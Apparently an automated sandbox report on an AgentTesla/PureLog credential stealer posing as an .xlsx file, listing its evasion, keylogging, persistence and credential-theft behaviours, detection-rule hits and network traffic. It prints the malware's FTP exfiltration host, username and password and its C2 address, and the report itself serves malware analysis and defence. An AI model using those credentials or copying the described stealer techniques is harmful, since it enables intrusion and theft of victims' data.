Edit tour

Windows Analysis Report
BL NBNSA240600050.xlsx.exe

Overview

General Information

Sample name:	BL NBNSA240600050.xlsx.exe
Analysis ID:	1479357
MD5:	7dc8ba9345de935c7b90ea6c61f3464f
SHA1:	78786835c8b7b91c0223e970a45b50176eb96b33
SHA256:	fca147ee2f07c81f599b17e6957d45b40dd29518e9ff97bb90b742ea1c27bcea
Tags:	exe
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to log keystrokes (.Net Source)

Drops executable to a common third party application directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

BL NBNSA240600050.xlsx.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)

BL NBNSA240600050.xlsx.exe (PID: 2912 cmdline: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)

adobe.exe (PID: 3312 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)

adobe.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)

adobe.exe (PID: 7428 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)

adobe.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1813288032.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 3312	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: adobe.exe PID: 5852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 5852	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 7500	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 7500	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.8110000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.adobe.exe.2a7f0b8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.adobe.exe.2a7f0b8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32162:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x321d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3225e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x322f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3235a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x323cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32462:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x324f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f4ad:$s2: GetPrivateProfileString 0x2eb59:$s3: get_OSFullName 0x301ab:$s5: remove_Key 0x30371:$s5: remove_Key 0x31230:$s6: FtpWebRequest 0x32144:$s7: logins 0x326b6:$s7: logins 0x35399:$s7: logins 0x35479:$s7: logins 0x36dca:$s7: logins 0x36013:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32162:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x321d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3225e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x322f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3235a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x323cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32462:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x324f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f4ad:$s2: GetPrivateProfileString 0x2eb59:$s3: get_OSFullName 0x301ab:$s5: remove_Key 0x30371:$s5: remove_Key 0x31230:$s6: FtpWebRequest 0x32144:$s7: logins 0x326b6:$s7: logins 0x35399:$s7: logins 0x35479:$s7: logins 0x36dca:$s7: logins 0x36013:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f382:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f3f4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3405e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f47e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f510:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3415a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f57a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f5ec:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34262:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f682:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x342f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f712:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x312ad:$s2: GetPrivateProfileString 0x6c6cd:$s2: GetPrivateProfileString 0x30959:$s3: get_OSFullName 0x6bd79:$s3: get_OSFullName 0x31fab:$s5: remove_Key 0x32171:$s5: remove_Key 0x6d3cb:$s5: remove_Key 0x6d591:$s5: remove_Key 0x33030:$s6: FtpWebRequest 0x6e450:$s6: FtpWebRequest 0x33f44:$s7: logins 0x344b6:$s7: logins 0x37199:$s7: logins 0x37279:$s7: logins 0x38bca:$s7: logins 0x6f364:$s7: logins 0x6f8d6:$s7: logins 0x725b9:$s7: logins 0x72699:$s7: logins 0x73fea:$s7: logins 0x37e13:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f582:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xaa9a2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f5f4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xaaa14:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3405e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f67e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xaaa9e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f710:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xaab30:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3415a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f77a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xaab9a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f7ec:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaac0c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34262:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f882:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaaca2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x312ad:$s2: GetPrivateProfileString 0x6c8cd:$s2: GetPrivateProfileString 0xa7ced:$s2: GetPrivateProfileString 0x30959:$s3: get_OSFullName 0x6bf79:$s3: get_OSFullName 0xa7399:$s3: get_OSFullName 0x31fab:$s5: remove_Key 0x32171:$s5: remove_Key 0x6d5cb:$s5: remove_Key 0x6d791:$s5: remove_Key 0xa89eb:$s5: remove_Key 0xa8bb1:$s5: remove_Key 0x33030:$s6: FtpWebRequest 0x6e650:$s6: FtpWebRequest 0xa9a70:$s6: FtpWebRequest 0x33f44:$s7: logins 0x344b6:$s7: logins 0x37199:$s7: logins 0x37279:$s7: logins 0x38bca:$s7: logins 0x6f564:$s7: logins
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe", CommandLine: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, NewProcessName: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe", ProcessId: 7064, ProcessName: BL NBNSA240600050.xlsx.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, ProcessId: 2912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 213.189.52.181

Timestamp:	2024-07-23T15:05:21.347468+0200
SID:	2855542
Source Port:	49748
Destination Port:	63434
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 213.189.52.181

Timestamp:	2024-07-23T15:05:21.331691+0200
SID:	2855542
Source Port:	49748
Destination Port:	63434
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE AgentTesla Exfil via FTP - Source IP: 192.168.2.4 - Destination IP: 213.189.52.181

Timestamp:	2024-07-23T15:04:59.113823+0200
SID:	2029927
Source Port:	49734
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE AgentTesla Exfil via FTP - Source IP: 192.168.2.4 - Destination IP: 213.189.52.181

Timestamp:	2024-07-23T15:05:20.765442+0200
SID:	2029927
Source Port:	49747
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 213.189.52.181

Timestamp:	2024-07-23T15:04:59.688534+0200
SID:	2855542
Source Port:	49736
Destination Port:	63043
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 213.189.52.181

Timestamp:	2024-07-23T15:04:59.682766+0200
SID:	2855542
Source Port:	49736
Destination Port:	63043
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: BL NBNSA240600050.xlsx.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: BL NBNSA240600050.xlsx.exe

Joe Sandbox ML: detected

Source: BL NBNSA240600050.xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: BL NBNSA240600050.xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: thQh.pdb source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr
Source:	Binary string: thQh.pdbSHA256 source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 213.189.52.181:63043

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

ASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown

FTP traffic detected: 213.189.52.181:21 -> 192.168.2.4:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s4.serv00.com

Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002776000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s4.serv00.com
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.1893877251.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
